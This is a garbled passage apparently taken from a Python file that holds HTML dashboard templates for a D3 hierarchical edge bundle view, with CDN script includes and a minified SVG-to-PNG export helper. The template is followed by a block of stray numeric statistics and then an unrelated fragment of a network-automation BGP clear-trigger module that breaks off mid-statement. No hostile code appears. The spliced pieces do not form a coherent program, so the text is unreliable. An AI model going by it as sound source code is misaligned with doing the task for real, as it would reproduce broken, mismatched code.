<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.4.8/angular.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.4.8/angular-animate.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.4.8/angular-aria.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angular_material/1.0.0/angular-material.min.js"></script>
<script src="https://rawgit.com/rzajac/angularjs-slider/master/dist/rzslider.js"></script>
<script src="https://d3js.org/d3.v5.min.js"></script>
<script>
(function(){var g=typeof exports!="undefined"&&exports||this;var b='<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">';function e(h){return h&&h.lastIndexOf("http",0)==0&&h.lastIndexOf(window.location.host)==-1}function a(k,m){var h=k.querySelectorAll("image");var l=h.length;if(l==0){m()}for(var j=0;j<h.length;j++){(function(q){var o=q.getAttributeNS("http://www.w3.org/1999/xlink","href");if(o){if(e(o.value)){console.warn("Cannot render embedded images linking to external hosts: "+o.value);return}}var p=document.createElement("canvas");var i=p.getContext("2d");var n=new Image();o=o||q.getAttribute("href");n.src=o;n.onload=function(){p.width=n.width;p.height=n.height;i.drawImage(n,0,0);q.setAttributeNS("http://www.w3.org/1999/xlink","href",p.toDataURL("image/png"));l--;if(l==0){m()}};n.onerror=function(){console.log("Could not load "+o);l--;if(l==0){m()}}})(h[j])}}function f(h,k){var r="";var q=document.styleSheets;for(var o=0;o<q.length;o++){try{var u=q[o].cssRules}catch(s){console.warn("Stylesheet could not be loaded: "+q[o].href);continue}if(u!=null){for(var n=0;n<u.length;n++){var t=u[n];if(typeof(t.style)!="undefined"){var p=null;try{p=h.querySelector(t.selectorText)}catch(m){console.warn('Invalid CSS selector "'+t.selectorText+'"',m)}if(p){var l=k?k(t.selectorText):t.selectorText;r+=l+" { "+t.style.cssText+" }\\n"}else{if(t.cssText.match(/^@font-face/)){r+=t.cssText+"\\n"}}}}}}return r}function d(i,k,j){var h=(i.viewBox.baseVal&&i.viewBox.baseVal[j])||(k.getAttribute(j)!==null&&!k.getAttribute(j).match(/%$$/)&&parseInt(k.getAttribute(j)))||i.getBoundingClientRect()[j]||parseInt(k.style[j])||parseInt(window.getComputedStyle(i).getPropertyValue(j));return(typeof h==="undefined"||h===null||isNaN(parseFloat(h)))?0:h}function c(h){h=encodeURIComponent(h);h=h.replace(/%([0-9A-F]{2})/g,function(i,j){var k=String.fromCharCode("0x"+j);return k==="%"?"%25":k});return 
decodeURIComponent(h)}g.svgAsDataUri=function(j,i,h){i=i||{};i.scale=i.scale||1;var k="http://www.w3.org/2000/xmlns/";a(j,function(){var u=document.createElement("div");var r=j.cloneNode(true);var l,t;if(j.tagName=="svg"){l=i.width||d(j,r,"width");t=i.height||d(j,r,"height")}else{if(j.getBBox){var o=j.getBBox();l=o.x+o.width;t=o.y+o.height;r.setAttribute("transform",r.getAttribute("transform").replace(/translate\(.*?\)/,""));var p=document.createElementNS("http://www.w3.org/2000/svg","svg");p.appendChild(r);r=p}else{console.error("Attempted to render non-SVG element",j);return}}r.setAttribute("version","1.1");r.setAttributeNS(k,"xmlns","http://www.w3.org/2000/svg");r.setAttributeNS(k,"xmlns:xlink","http://www.w3.org/1999/xlink");r.setAttribute("width",l*i.scale);r.setAttribute("height",t*i.scale);r.setAttribute("viewBox",[i.left||0,i.top||0,l,t].join(" "));u.appendChild(r);var q=f(j,i.selectorRemap);var v=document.createElement("style");v.setAttribute("type","text/css");v.innerHTML="<![CDATA[\\n"+q+"\\n]]>";var n=document.createElement("defs");n.appendChild(v);r.insertBefore(n,r.firstChild);var p=b+u.innerHTML;var m="data:image/svg+xml;base64,"+window.btoa(c(p));if(h){h(m)}})};g.svgAsPngUri=function(j,i,h){g.svgAsDataUri(j,i,function(k){var l=new Image();l.onload=function(){var n=document.createElement("canvas");n.width=l.width;n.height=l.height;var o=n.getContext("2d");if(i&&i.backgroundColor){o.fillStyle=i.backgroundColor;o.fillRect(0,0,n.width,n.height)}o.drawImage(l,0,0);var m=document.createElement("a");h(n.toDataURL("image/png"))};l.src=k})};g.saveSvgAsPng=function(j,i,h){h=h||{};g.svgAsPngUri(j,h,function(l){var k=document.createElement("a");k.download=i;k.href=l;document.body.appendChild(k);k.addEventListener("click",function(m){k.parentNode.removeChild(k)});k.click()})}})();
</script>
<script> $js_text </script>
'''
return html_text
def __getHTMLdashboard(self):
html_text = '''
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style> $css_text </style>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.2.1/css/bootstrap.min.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<link rel="stylesheet" type="text/css" href="https://rawgit.com/rzajac/angularjs-slider/master/dist/rzslider.css">
</head>
<body ng-app="rzSliderDemo">
<div class="container-fluid py-5">
<div class="row" ng-controller="MainCtrl">
<div class="col-lg-9 col-12">
<div class="row">
<div class="col-md-12 mb-3">
<div class="card summary">
<div class="card-header">
<h4>Hierarchical Edge Bundle</h4>
</div>
<div class="card-body">
<div id="edgeBundlePanel"></div>
</div>
</div>
</div>
</div>
</div>
<div class="col-lg-3 col-12">
<div class="card mb-3">
<div class="card-body">
<div class="input-group mb-3">
<div class="card-body">
<div class="row col-2-auto">
<form id="filterType">
<input type='radio' id="scoreRadio" value="Score" name="mode" ng-click="score_toggle()" checked/> Score
<input type='radio' id="pvalueRadio" value="Pvalue" name="mode" ng-click="pvalue_toggle()"/> Pvalue
</form>
</div>
<div class="row col-3-auto">
<form id="scoreSelect">
<input type="radio" id="PosScoreRadio" name="mode" value="Positve" ng-click="pos_toggle()"/> Positive
<input type="radio" id="NegScoreRadio" name="mode" value="Negative" ng-click="neg_toggle()"/> Negative
<input type="radio" id="AbsScoreRadio" name="mode" value="Absolute" ng-click="abs_toggle()" checked/> Absolute
</form>
</div>
<div ng-show="abs_visible" class="row">
<rzslider id="abs_slider" class="abs_slider" rz-slider-model="abs_slider.minValue" rz-slider-high="abs_slider.maxValue" rz-slider-options="abs_slider.options"></rzslider>
</div>
<div ng-show="pos_visible" class="row">
<rzslider id="pos_slider" class="pos_slider" rz-slider-model="pos_slider.minValue" rz-slider-high="pos_slider.maxValue" rz-slider-options="pos_slider.options"></rzslider>
</div>
<div ng-show="neg_visible" class="row">
<rzslider id="neg_slider" class="neg_slider" rz-slider-model="neg_slider.minValue" rz-slider-high="neg_slider.maxValue" rz-slider-options="neg_slider.options"></rzslider>
</div>
<div ng-show="pvalue_visible" class="row">
<rzslider id="pvalue_slider" class="pvalue_slider" rz-slider-model="pvalue_slider.minValue" rz-slider-high="pvalue_slider.maxValue" rz-slider-options="pvalue_slider.options"></rzslider>
</div>
<div class="row">
<rzslider id="tension_slider" class="tension_slider" rz-slider-model="tension_slider.value" rz-slider-options="tension_slider.options"></rzslider>
</div>
<div id="save" class="row">
<button data-ng-click="savebutton()">Save</button>
</div>
</div>
</div>
</div>
</div>
<div class="card">
<div class="card-header">
<h4>Node Data</h4>
</div>
<div class="card-body">
<div id="nodedataPanel"></div>
</div>
</div>
</div>
</div>
</div>
</body>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.2.1/js/bootstrap.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.4.8/angular.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.4.8/angular-animate.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.4.8/angular-aria.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angular_material/1.0.0/angular-material.min.js"></script>
<script src="https://rawgit.com/rzajac/angularjs-slider/master/dist/rzslider.js"></script>
<script src="https://d3js.org/d3.v5.min.js"></script>
<script>
(function(){var g=typeof exports!="undefined"&&exports||this;var b='<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">';function e(h){return h&&h.lastIndexOf("http",0)==0&&h.lastIndexOf(window.location.host)==-1}function a(k,m){var h=k.querySelectorAll("image");var l=h.length;if(l==0){m()}for(var j=0;j<h.length;j++){(function(q){var o=q.getAttributeNS("http://www.w3.org/1999/xlink","href");if(o){if(e(o.value)){console.warn("Cannot render embedded images linking to external hosts: "+o.value);return}}var p=document.createElement("canvas");var i=p.getContext("2d");var n=new Image();o=o||q.getAttribute("href");n.src=o;n.onload=function(){p.width=n.width;p.height=n.height;i.drawImage(n,0,0);q.setAttributeNS("http://www.w3.org/1999/xlink","href",p.toDataURL("image/png"));l--;if(l==0){m()}};n.onerror=function(){console.log("Could not load "+o);l--;if(l==0){m()}}})(h[j])}}function f(h,k){var r="";var q=document.styleSheets;for(var o=0;o<q.length;o++){try{var u=q[o].cssRules}catch(s){console.warn("Stylesheet could not be loaded: "+q[o].href);continue}if(u!=null){for(var n=0;n<u.length;n++){var t=u[n];if(typeof(t.style)!="undefined"){var p=null;try{p=h.querySelector(t.selectorText)}catch(m){console.warn('Invalid CSS selector "'+t.selectorText+'"',m)}if(p){var l=k?k(t.selectorText):t.selectorText;r+=l+" { "+t.style.cssText+" }\\n"}else{if(t.cssText.match(/^@font-face/)){r+=t.cssText+"\\n"}}}}}}return r}function d(i,k,j){var h=(i.viewBox.baseVal&&i.viewBox.baseVal[j])||(k.getAttribute(j)!==null&&!k.getAttribute(j).match(/%$$/)&&parseInt(k.getAttribute(j)))||i.getBoundingClientRect()[j]||parseInt(k.style[j])||parseInt(window.getComputedStyle(i).getPropertyValue(j));return(typeof h==="undefined"||h===null||isNaN(parseFloat(h)))?0:h}function c(h){h=encodeURIComponent(h);h=h.replace(/%([0-9A-F]{2})/g,function(i,j){var k=String.fromCharCode("0x"+j);return k==="%"?"%25":k});return 
decodeURIComponent(h)}g.svgAsDataUri=function(j,i,h){i=i||{};i.scale=i.scale||1;var k="http://www.w3.org/2000/xmlns/";a(j,function(){var u=document.createElement("div");var r=j.cloneNode(true);var l,t;if(j.tagName=="svg"){l=i.width||d(j,r,"width");t=i.height||d(j,r,"height")}else{if(j.getBBox){var o=j.getBBox();l=o.x+o.width;t=o.y+o.height;r.setAttribute("transform",r.getAttribute("transform").replace(/translate\(.*?\)/,""));var p=document.createElementNS("http://www.w3.org/2000/svg","svg");p.appendChild(r);r=p}else{console.error("Attempted to render non-SVG element",j);return}}r.setAttribute("version","1.1");r.setAttributeNS(k,"xmlns","http://www.w3.org/2000/svg");r.setAttributeNS(k,"xmlns:xlink","http://www.w3.org/1999/xlink");r.setAttribute("width",l*i.scale);r.setAttribute("height",t*i.scale);r.setAttribute("viewBox",[i.left||0,i.top||0,l,t].join(" "));u.appendChild(r);var q=f(j,i.selectorRemap);var v=document.createElement("style");v.setAttribute("type","text/css");v.innerHTML="<![CDATA[\\n"+q+"\\n]]>";var n=document.createElement("defs");n.appendChild(v);r.insertBefore(n,r.firstChild);var p=b+u.innerHTML;var m="data:image/svg+xml;base64,"+window.btoa(c(p));if(h){h(m)}})};g.svgAsPngUri=function(j,i,h){g.svgAsDataUri(j,i,function(k){var l=new Image();l.onload=function(){var n=document.createElement("canvas");n.width=l.width;n.height=l.height;var o=n.getContext("2d");if(i&&i.backgroundColor){o.fillStyle=i.backgroundColor;o.fillRect(0,0,n.width,n.height)}o.drawImage(l,0,0);var m=document.createElement("a");h(n.toDataURL("image/png"))};l.src=k})};g.saveSvgAsPng=function(j,i,h){h=h||{};g.svgAsPngUri(j,h,function(l){var k=document.createElement("a");k.download=i;k.href=l;document.body.appendChild(k);k.addEventListener("click",function(m){k.parentNode.removeChild(k)});k.click()})}})();
</script>
<script> $js_text </script>
'''
return html_text
| 51.600928
| 3,807
| 0.414782
| 14,391
| 177,920
| 4.999305
| 0.056633
| 0.011342
| 0.0103
| 0.02135
| 0.871096
| 0.857919
| 0.84559
| 0.837918
| 0.829147
| 0.822767
| 0
| 0.011895
| 0.480722
| 177,920
| 3,448
| 3,808
| 51.600928
| 0.766815
| 0.001518
| 0
| 0.74925
| 0
| 0.053223
| 0.838827
| 0.155876
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007871
| false
| 0
| 0.017241
| 0
| 0.040105
| 0.014243
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c4d847b499d717984dc63570952952722a9614ff
| 7,260
|
py
|
Python
|
visualization/sensors.py
|
h-mayorquin/time_series_basic
|
654fb67ef6258b3f200c15a2b8068ab9300401d7
|
[
"BSD-3-Clause"
] | null | null | null |
visualization/sensors.py
|
h-mayorquin/time_series_basic
|
654fb67ef6258b3f200c15a2b8068ab9300401d7
|
[
"BSD-3-Clause"
] | null | null | null |
visualization/sensors.py
|
h-mayorquin/time_series_basic
|
654fb67ef6258b3f200c15a2b8068ab9300401d7
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Visualization functions related to the sensors.
"""
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
import seaborn as sns
import numpy as np
import nexa.loading as load
sns.set(style='white')
def visualize_STDM(nexa_object, ax=None):
    """
    Plot the Spatio Temporal Distance Matrix of *nexa_object* as a
    seaborn heatmap.

    Parameters
    ----------
    nexa_object : object exposing a 2-D ``STDM`` attribute.
    ax : matplotlib Axes, optional
        Axes to draw into; a new figure/axes pair is created when None.

    Returns
    -------
    The newly created Figure when *ax* was None, otherwise *ax*.

    NOTE(review): a later ``visualize_STDM`` definition in this module
    shadows this one at import time — confirm which version is intended.
    """
    to_plot = nexa_object.STDM
    # Track figure ownership explicitly: the original rebound ``ax`` and
    # then re-tested ``ax is None``, so the Figure was never returned.
    fig = None
    if ax is None:
        fig, ax = plt.subplots(figsize=(11, 9))
    # Generate a custom diverging colormap
    cmap = sns.diverging_palette(220, 10, as_cmap=True)
    # Draw the heatmap with the mask and correct aspect ratio
    sns.heatmap(to_plot, mask=None, cmap=cmap,
                vmax=1.0, vmin=-1.0,
                square=True, xticklabels=5, yticklabels=5,
                linewidths=.5, cbar_kws={"shrink": .5}, ax=ax)
    plt.title('Spatio Temporal Distance Matrix (Distances)')
    return ax if fig is None else fig
def visualize_SLM(nexa_object, cmap='coolwarm', inter='none',
                  origin='upper', fontsize=16, aspect='auto',
                  colorbar=True, ax=None, symmetry=True):
    """
    Plot the Sensor Lagged Matrix (SLM) of *nexa_object* with imshow.

    Parameters
    ----------
    nexa_object : object exposing a 2-D ``SLM`` attribute.
    cmap, inter, origin, aspect : forwarded to ``Axes.imshow``.
    fontsize : int
        Applied to the title, axis labels and tick labels.
    colorbar : bool
        Attach a colorbar to the right of the axes when True.
    ax : matplotlib Axes, optional
        Axes to draw into; a new 16x12 figure is created when None.
    symmetry : bool
        When True, color limits are symmetric around zero
        (``vmin = -vmax = -max(|SLM|)``) so diverging colormaps center.

    Returns
    -------
    The ``AxesImage`` returned by ``imshow``.
    """
    to_plot = nexa_object.SLM
    if ax is None:
        fig = plt.figure(figsize=(16, 12))
        ax = fig.add_axes([0.1, 0.1, 0.8, 0.8])
    if symmetry:
        # max(|SLM|) == max(|max|, |min|): symmetric limits around zero.
        vmax = np.max(np.abs(to_plot))
        im = ax.imshow(to_plot, interpolation=inter, vmin=-vmax,
                       vmax=vmax, cmap=cmap, origin=origin,
                       aspect=aspect)
    else:
        im = ax.imshow(to_plot, interpolation=inter, cmap=cmap,
                       origin=origin, aspect=aspect)
    fig = im.get_figure()
    # Set the labels and title
    ax.set_xlabel('Time Windows')
    ax.set_ylabel('Lagged Sensors')
    ax.set_title('Sensor Lagged Matrix')
    # Change the font sizes.  A distinct loop variable is used: the
    # original rebound ``ax`` here, so the colorbar below could attach
    # to the wrong axes when the figure holds more than one.
    for axis in fig.get_axes():
        for item in ([axis.title, axis.xaxis.label, axis.yaxis.label] +
                     axis.get_xticklabels() + axis.get_yticklabels()):
            item.set_fontsize(fontsize)
    # Colorbar (this keeps the main axes displayed at the proper size)
    if colorbar:
        divider = make_axes_locatable(ax)
        cax = divider.append_axes("right", size="5%", pad=0.05)
        cbar = fig.colorbar(im, cax=cax)
        cbar.solids.set_edgecolor('face')
    return im
def visualize_STDM(nexa_object, cmap='coolwarm', inter='none',
                   origin='upper', fontsize=16, aspect='auto',
                   colorbar=True):
    """
    Plot the Spatio Temporal Distance Matrix of *nexa_object* with imshow.

    Parameters
    ----------
    nexa_object : object exposing a 2-D ``STDM`` attribute.
    cmap, inter, origin, aspect : forwarded to ``Axes.imshow``.
    fontsize : int
        Applied to the title, axis labels and tick labels.
    colorbar : bool
        Attach a colorbar to the right of the axes when True.

    Returns
    -------
    The created matplotlib Figure.

    NOTE(review): the original also read ``nexa_object.Nlags`` and
    ``nexa_object.sensors.Nsensors`` without using them; those reads
    were dropped here — restore them if they have side effects.
    """
    to_plot = nexa_object.STDM
    # Both axes index the same flattened (time lag x sensor) dimension.
    label = 'Time lags * Sensors'
    fig = plt.figure(figsize=(16, 12))
    ax = fig.add_axes([0.1, 0.1, 0.8, 0.8])
    im = ax.imshow(to_plot, interpolation=inter, cmap=cmap,
                   origin=origin, aspect=aspect)
    # Set the labels and title
    ax.set_xlabel(label)
    ax.set_ylabel(label)
    ax.set_title('Spatio Temporal Distance Matrix')
    # Change the font sizes (distinct loop variable so ``ax`` keeps
    # pointing at the plotting axes for the colorbar below)
    for axis in fig.get_axes():
        for item in ([axis.title, axis.xaxis.label, axis.yaxis.label] +
                     axis.get_xticklabels() + axis.get_yticklabels()):
            item.set_fontsize(fontsize)
    # Colorbar (this keeps the main axes displayed at the proper size)
    if colorbar:
        divider = make_axes_locatable(ax)
        cax = divider.append_axes("right", size="5%", pad=0.05)
        cbar = fig.colorbar(im, cax=cax)
        cbar.solids.set_edgecolor('face')
    return fig
def visualize_SLM_hdf5(database, run_name, cmap='coolwarm', inter='none',
                       origin='upper', fontsize=16, aspect='auto',
                       colorbar=True, ax=None, symmetry=True):
    """
    Plot the SLM for a particular database of a hdf5 storage and a
    particular run.

    Parameters
    ----------
    database : hdf5 storage handle accepted by ``load.get_SLM_hdf5``.
    run_name : identifier of the run inside *database*.
    cmap, inter, origin, aspect : forwarded to ``Axes.imshow``.
    fontsize : int
        Applied to the title, axis labels and tick labels.
    colorbar : bool
        Attach a colorbar to the right of the axes when True.
    ax : matplotlib Axes, optional
        Axes to draw into; a new 16x12 figure is created when None.
    symmetry : bool
        When True, color limits are symmetric around zero
        (``vmin = -vmax = -max(|SLM|)``) so diverging colormaps center.

    Returns
    -------
    The ``AxesImage`` returned by ``imshow``.
    """
    to_plot = load.get_SLM_hdf5(database, run_name)
    if ax is None:
        fig = plt.figure(figsize=(16, 12))
        ax = fig.add_axes([0.1, 0.1, 0.8, 0.8])
    if symmetry:
        # max(|SLM|) == max(|max|, |min|): symmetric limits around zero.
        vmax = np.max(np.abs(to_plot))
        im = ax.imshow(to_plot, interpolation=inter, vmin=-vmax,
                       vmax=vmax, cmap=cmap, origin=origin,
                       aspect=aspect)
    else:
        im = ax.imshow(to_plot, interpolation=inter, cmap=cmap,
                       origin=origin, aspect=aspect)
    fig = im.get_figure()
    # Set the labels and title
    ax.set_xlabel('Time Windows')
    ax.set_ylabel('Lagged Sensors')
    ax.set_title('Sensor Lagged Matrix')
    # Change the font sizes.  A distinct loop variable is used: the
    # original rebound ``ax`` here, so the colorbar below could attach
    # to the wrong axes when the figure holds more than one.
    for axis in fig.get_axes():
        for item in ([axis.title, axis.xaxis.label, axis.yaxis.label] +
                     axis.get_xticklabels() + axis.get_yticklabels()):
            item.set_fontsize(fontsize)
    # Colorbar (this keeps the main axes displayed at the proper size)
    if colorbar:
        divider = make_axes_locatable(ax)
        cax = divider.append_axes("right", size="5%", pad=0.05)
        cbar = fig.colorbar(im, cax=cax)
        cbar.solids.set_edgecolor('face')
    return im
def visualize_STDM_hdf5(database, run_name, nexa_arrangement,
                        ax=None):
    """
    Plot the STDM for a run stored in a hdf5 database as a seaborn
    heatmap and return the Axes it was drawn on.

    A new 11x9 figure is created when *ax* is None.  Note the global
    side effect: the seaborn font scale is set to 2 for the session.
    """
    sns.set(font_scale=2)
    stdm = load.get_STDM_hdf5(database, run_name, nexa_arrangement)
    if ax is None:
        _, ax = plt.subplots(figsize=(11, 9))
    # Custom diverging colormap, centered for the [-1, 1] value range
    palette = sns.diverging_palette(220, 10, as_cmap=True)
    ax = sns.heatmap(stdm, mask=None, cmap=palette,
                     vmax=1.0, vmin=-1.0,
                     square=True, xticklabels=False, yticklabels=False,
                     linewidths=.5, cbar_kws={"shrink": .5}, ax=ax)
    ax.set_title('Spatio Temporal Distance Matrix')
    return ax
| 28.470588
| 73
| 0.605923
| 971
| 7,260
| 4.397528
| 0.176107
| 0.030913
| 0.015457
| 0.01171
| 0.813583
| 0.765808
| 0.759016
| 0.742155
| 0.728571
| 0.728571
| 0
| 0.018196
| 0.28843
| 7,260
| 254
| 74
| 28.582677
| 0.808362
| 0.151102
| 0
| 0.79085
| 0
| 0
| 0.054407
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03268
| false
| 0
| 0.03268
| 0
| 0.104575
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c4f2a1c1d9195376a459d2b9a60f9b3417647077
| 100
|
py
|
Python
|
shadowhand_gym/envs/tasks/__init__.py
|
szahlner/shadowhand-gym
|
a7fbbe8ddcc2ecbead9349b0f377a3066ca94233
|
[
"MIT"
] | 11
|
2021-08-30T12:09:16.000Z
|
2021-12-13T15:10:27.000Z
|
shadowhand_gym/envs/tasks/__init__.py
|
szahlner/shadowhand-gym
|
a7fbbe8ddcc2ecbead9349b0f377a3066ca94233
|
[
"MIT"
] | null | null | null |
shadowhand_gym/envs/tasks/__init__.py
|
szahlner/shadowhand-gym
|
a7fbbe8ddcc2ecbead9349b0f377a3066ca94233
|
[
"MIT"
] | null | null | null |
from shadowhand_gym.envs.tasks.reach import Reach
from shadowhand_gym.envs.tasks.block import Block
| 33.333333
| 49
| 0.86
| 16
| 100
| 5.25
| 0.5
| 0.333333
| 0.404762
| 0.5
| 0.619048
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.08
| 100
| 2
| 50
| 50
| 0.913043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
f21b5516002873952cdf2344898cd77f63730f62
| 959
|
py
|
Python
|
app/migrations/0005_auto_20201111_2107.py
|
1-gut/musicsamples
|
a2846cb91534885ba5ef82d893658c2c74302455
|
[
"MIT"
] | null | null | null |
app/migrations/0005_auto_20201111_2107.py
|
1-gut/musicsamples
|
a2846cb91534885ba5ef82d893658c2c74302455
|
[
"MIT"
] | 11
|
2022-02-01T20:49:15.000Z
|
2022-03-28T18:17:46.000Z
|
app/migrations/0005_auto_20201111_2107.py
|
1-gut/musicsamples
|
a2846cb91534885ba5ef82d893658c2c74302455
|
[
"MIT"
] | 2
|
2021-09-17T08:38:14.000Z
|
2021-09-17T10:21:25.000Z
|
# Generated by Django 3.1.2 on 2020-11-11 21:07
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add nullable ``sample_volume`` / ``sample_volume_units`` fields.

    The same two optional columns are added to both ``sample`` and
    ``historicalsample`` so the two models keep identical schemas.
    Auto-generated by Django 3.1.2 (see the header comment); keep the
    operations verbatim.
    """

    dependencies = [
        ("app", "0004_historicalsample"),
    ]

    operations = [
        # Historical (shadow) model first, then the live model; each
        # gets the same pair of blank/null-allowed fields.
        migrations.AddField(
            model_name="historicalsample",
            name="sample_volume",
            field=models.IntegerField(blank=True, null=True),
        ),
        migrations.AddField(
            model_name="historicalsample",
            name="sample_volume_units",
            field=models.CharField(blank=True, max_length=30, null=True),
        ),
        migrations.AddField(
            model_name="sample",
            name="sample_volume",
            field=models.IntegerField(blank=True, null=True),
        ),
        migrations.AddField(
            model_name="sample",
            name="sample_volume_units",
            field=models.CharField(blank=True, max_length=30, null=True),
        ),
    ]
| 28.205882
| 73
| 0.584984
| 95
| 959
| 5.768421
| 0.4
| 0.109489
| 0.167883
| 0.19708
| 0.733577
| 0.733577
| 0.733577
| 0.733577
| 0.625912
| 0.625912
| 0
| 0.034277
| 0.300313
| 959
| 33
| 74
| 29.060606
| 0.782414
| 0.046924
| 0
| 0.740741
| 1
| 0
| 0.144737
| 0.023026
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.037037
| 0
| 0.148148
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
480d4191c44ca1f5784c2abf84844dcb578c2a6a
| 32
|
py
|
Python
|
test/regression/features/lists/list_append.py
|
ppelleti/berp
|
30925288376a6464695341445688be64ac6b2600
|
[
"BSD-3-Clause"
] | 137
|
2015-02-13T21:03:23.000Z
|
2021-11-24T03:53:55.000Z
|
test/regression/features/lists/list_append.py
|
ppelleti/berp
|
30925288376a6464695341445688be64ac6b2600
|
[
"BSD-3-Clause"
] | 4
|
2015-04-01T13:49:13.000Z
|
2019-07-09T19:28:56.000Z
|
test/regression/features/lists/list_append.py
|
bjpop/berp
|
30925288376a6464695341445688be64ac6b2600
|
[
"BSD-3-Clause"
] | 8
|
2015-04-25T03:47:52.000Z
|
2019-07-27T06:33:56.000Z
|
# Regression test for list concatenation with "+", including the empty
# list as a right operand; prints [1, 2, 3, 4, 5, 6, 7].
print([1,2,3] + [4,5,6,7] + [])
| 16
| 31
| 0.375
| 8
| 32
| 1.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.259259
| 0.15625
| 32
| 1
| 32
| 32
| 0.185185
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
48394a5e90fb39a8a4d4b29f7a66203d3831e541
| 26,528
|
py
|
Python
|
pkgs/sdk-pkg/src/genie/libs/sdk/triggers/clear/bgp/clear.py
|
miott/genielibs
|
6464642cdd67aa2367bdbb12561af4bb060e5e62
|
[
"Apache-2.0"
] | null | null | null |
pkgs/sdk-pkg/src/genie/libs/sdk/triggers/clear/bgp/clear.py
|
miott/genielibs
|
6464642cdd67aa2367bdbb12561af4bb060e5e62
|
[
"Apache-2.0"
] | 1
|
2020-08-01T00:59:29.000Z
|
2020-08-01T00:59:32.000Z
|
pkgs/sdk-pkg/src/genie/libs/sdk/triggers/clear/bgp/clear.py
|
miott/genielibs
|
6464642cdd67aa2367bdbb12561af4bb060e5e62
|
[
"Apache-2.0"
] | null | null | null |
'''Common implementation for bgp clear triggers'''
# python
from functools import partial
# genie libs
from genie.libs.sdk.libs.utils.mapping import Mapping
from genie.libs.sdk.triggers.clear.clear import TriggerClear, verify_clear_callable
from genie.libs.sdk.libs.utils.triggeractions import CompareUptime
# Ignore keys when doing the diff with Ops objects for save_snapshot and
# verify_clear, it will be used for LearnPollDiff.ops_diff callable.
# NOTE(review): these appear to be volatile counters/timers expected to
# change across a clear (which would otherwise produce spurious diffs) —
# confirm against LearnPollDiff.ops_diff.
exclude = ['keepalives','total', 'total_bytes', 'up_time', 'opens', 'capability',
           'updates', 'notifications', 'foreign_port', 'local_port', 'totals',
           'bgp_table_version', 'route_refresh', 'maker', 'callables',
           'connections_dropped', 'connections_established', 'last_reset',
           'bgp_negotiated_keepalive_timers', 'distance_extern_as',
           'reset_reason', 'holdtime', 'keepalive_interval']
class TriggerClearBgp(TriggerClear):
    """Clear BGP on every instance/vrf/neighbor.

    Pre-requirement: at least one neighbor with session_state 'established'.
    Post-verify: neighbor 'up_time' satisfies relation '<' against
    'compare_time', i.e. the uptime was reset by the clear.
    """

    # Argument with dynamic value for verify callable.
    # As the verify callable is re-used in multiple triggers with different
    # variable names, this dictionary maps
    # <expected argument name for callable>: <script argument name>
    verify_func_args={'r_obj': [['info', 'instance', '(?P<instance>.*)', 'vrf',
